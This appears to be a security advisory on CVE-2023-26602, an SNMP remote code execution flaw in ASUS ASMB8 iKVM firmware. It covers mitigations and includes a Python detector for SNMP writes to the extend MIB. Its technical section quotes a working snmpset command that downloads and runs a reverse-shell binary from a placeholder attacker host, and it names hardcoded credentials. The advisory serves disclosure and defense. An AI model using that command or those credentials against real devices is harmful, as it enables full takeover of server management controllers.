
A critical Remote Code Execution (RCE) vulnerability has been identified in ASUS ASMB8 iKVM firmware versions ≤1.14.51, tracked as CVE-2023-26602. With a CVSS score of 9.8, this flaw allows attackers to execute arbitrary commands via SNMP write access, posing significant risks to enterprise environments using affected devices. Exploitation attempts have been observed in the wild as of January 2024, according to Feedly reports [4].
Technical Analysis
The vulnerability stems from improper access controls in the SNMPv2 service of the ASMB8 iKVM firmware. Attackers can abuse the `NET-SNMP-EXTEND-MIB` module to execute shell commands with root privileges. A publicly available Proof of Concept (PoC) demonstrates how to deploy an ARM reverse shell using `snmpset` [1]:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private <target> 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"wget http://attacker/rt.bin -O /tmp/rt.bin && chmod +x /tmp/rt.bin && /tmp/rt.bin\"'
The exploit leverages hardcoded credentials (`sysadmin:superuser`) and bypasses SSH restrictions via the `defshell` mechanism. Successful exploitation grants full control over the Baseboard Management Controller (BMC), enabling persistent access to compromised systems.
Mitigation and Remediation
ASUS has not released an official patch as of April 2025. Recommended mitigation steps include:
- Disabling SNMP write access on all ASMB8 iKVM interfaces
- Isolating affected devices from untrusted networks
- Implementing network-level controls to monitor SNMP traffic patterns
Historical data shows similar vulnerabilities in ASUS hardware, including CVE-2008-1491 (ASMB3 DPC Proxy stack overflow) and CVE-2014-7269 (router RCE) [2]. This pattern underscores the need for continuous firmware updates and vendor monitoring.
Broader Impact
The EPSS score of 0.54% (74.4th percentile) suggests moderate exploitation likelihood [4]. However, combining this flaw with other ASUS vulnerabilities (e.g., the CVE-2024-33278 buffer overflow) could enable exploit chains for persistent network compromise. Organizations should prioritize:
| Risk Factor | Action |
|---|---|
| SNMP Exposure | Restrict to internal management networks |
| Firmware Integrity | Verify checksums before deployment |
| Network Segmentation | Isolate BMC interfaces from production traffic |
Security teams should reference NVD’s technical analysis [2] and monitor ASUS advisories for patch availability. The Exploit-DB entry (ID 52244) [1] provides additional technical context for detection rule development.
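One way to implement the SNMP monitoring recommended above, as an added example that is not taken from the advisory, ASUS, or the Exploit-DB entry: a Python detector that parses SNMPv1/v2c datagrams and flags SetRequest PDUs writing anywhere under `NET-SNMP-EXTEND-MIB` (`nsExtendObjects`, 1.3.6.1.4.1.8072.1.3.2). The function names, the `tlv`/`sample` builders and the packet bytes are constructed for illustration; it assumes you feed it UDP/161 payloads from a capture or sensor.

```python
EXTEND_SUBTREE = (1, 3, 6, 1, 4, 1, 8072, 1, 3, 2)  # NET-SNMP-EXTEND-MIB::nsExtendObjects
SET_REQUEST = 0xA3                                   # SetRequest-PDU tag (SNMPv1/v2c)

def tlvs(buf):  # yield (tag, value) for each BER element in buf
    pos = 0
    while pos < len(buf):
        tag, length, pos = buf[pos], buf[pos + 1], pos + 2
        if length & 0x80:                # long form: low 7 bits = count of length octets
            n = length & 0x7F
            length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
        if pos + length > len(buf):
            raise ValueError("truncated BER element")
        yield tag, buf[pos:pos + length]
        pos += length

def decode_oid(body):
    first = min(body[0] // 40, 2)        # first octet packs the first two arcs
    arcs, value = [first, body[0] - 40 * first], 0
    for octet in body[1:]:               # remaining arcs are base-128, high bit = "more"
        value = (value << 7) | (octet & 0x7F)
        if not octet & 0x80:
            arcs.append(value)
            value = 0
    return tuple(arcs)

def extend_mib_writes(datagram):
    """Return (community, [oids]) if a SetRequest writes under nsExtendObjects, else None."""
    try:
        ((_, msg),) = tlvs(datagram)                           # outer SEQUENCE
        (_, _ver), (_, community), (pdu_tag, pdu) = tlvs(msg)  # v1/v2c message layout
        if pdu_tag != SET_REQUEST:
            return None
        _rid, _status, _index, (_, varbinds) = tlvs(pdu)
        oids = [decode_oid(list(tlvs(vb))[0][1]) for _, vb in tlvs(varbinds)]
    except (IndexError, ValueError):
        return None                                            # not parseable as SNMPv1/v2c
    hits = [".".join(map(str, o)) for o in oids if o[:len(EXTEND_SUBTREE)] == EXTEND_SUBTREE]
    return (community.decode("latin-1"), hits) if hits else None

def tlv(tag, body):                      # builder for constructed samples (short lengths only)
    return bytes([tag, len(body)]) + body

def sample(pdu_tag, oid_hex, value):     # constructed SNMPv2c message, community "private"
    varbind = tlv(0x30, tlv(0x06, bytes.fromhex(oid_hex)) + value)
    pdu = tlv(pdu_tag, tlv(0x02, b"\x01") + tlv(0x02, b"\x00") * 2 + tlv(0x30, varbind))
    return tlv(0x30, tlv(0x02, b"\x01") + tlv(0x04, b"private") + pdu)

EXTEND_OID = "2b06010401bf0801030202010203636d64"    # nsExtendCommand."cmd", BER-encoded
SET_EXTEND = sample(0xA3, EXTEND_OID, tlv(0x04, b"constructed"))
```

`extend_mib_writes(SET_EXTEND)` returns the community string and the matched OID; reads of the same subtree and writes elsewhere (for example to `sysContact`) return `None`.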
Conclusion
CVE-2023-26602 represents a critical threat to organizations using ASUS ASMB8 iKVM devices for remote server management. While workarounds exist, the lack of a firmware patch necessitates heightened monitoring for SNMP-based attack patterns. This vulnerability highlights the ongoing challenges in securing embedded management interfaces against RCE threats.
References
- [1] “ASUS ASMB8 iKVM 1.14.51 – Remote Code Execution,” Exploit-DB, 2023.
- [2] “CVE-2023-26602 Detail,” NIST NVD, 2023.
- [3] “ASUS ASMB8 iKVM Product Page,” ASUS, 2025.
- [4] “CVE-2023-26602 Exploitation Timeline,” Feedly, 2024.